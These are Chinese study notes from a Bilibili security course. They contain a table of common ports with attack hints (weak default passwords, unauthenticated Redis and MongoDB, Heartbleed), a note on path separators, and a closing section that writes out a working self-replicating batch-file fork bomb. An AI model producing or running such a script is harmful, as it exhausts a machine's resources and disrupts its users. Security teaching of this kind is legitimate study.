声明!
学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页B站泷羽sec
1.常见端口对应的服务
ftp 21
tenlnet 23
80 web
80-89 可能是web
443 ssI心脏滴血漏洞以及一些web漏洞测试
445 smb
1433 mssql
1521 oracle
2082/2083 cpanel主机管理系统登陆(国外用的较多)
2222 da虚拟主机管理系统登陆(国外较多)
3128 squid代理默认端口-漫游内网
3306 mysql
3312/3311 kangle:主机管理系统登陆
3389 远程桌面
5432 postgreSQL
5900 vnc(shodan演示过了)
6379 redis(未接权)
7001.7002 weblogic 默认弱口令,反序列化
7778 kloxo主机控制面板登录
8000-9090 一些常见的wcb端口,有些运维喜把管理后台开这些非80端口上面
8080 tomacat、wdcp主机管理系统,默认弱口今
8080,8089,9090 jboss
8083 vestacp 主机管理系统(国外较多)
8649 ganglia
8888 宝塔主机管理默认端口
10000 virtuamin/webmin 服务器虚拟主机管理统
11211 memcache 未授权访问
27017,27018 mongodb 未授权访问(shodan讲过)
28017 mongodb 统计系统页面
windows\ linux/
-
Windows 操作系统 通常使用 反斜杠
\
作为路径分隔符,比如:
C:\Users\Username\Documents\file.txt
-
Linux 操作系统(包括其他 Unix-like 系统,如 macOS)通常使用 正斜杠
/
作为路径分隔符,比如:
/home/username/documents/file.txt
实战cmd编写bat病毒
资源耗尽病毒
bat(脚本 文件后缀名 .bat)
耗尽资源的bat病毒
echo start cmd >1.txt
在 Windows 的批处理脚本中,%0 是一个特殊变量,它代表正在执行的批处理文件的全路径和文件名。如果你想将这个信息追加到一个文本文件中(例如 1.txt),你可以使用 echo 命令配合重定向操作符 >> 来实现。
echo %0 >>1.txt
ren 1.txt 1.bat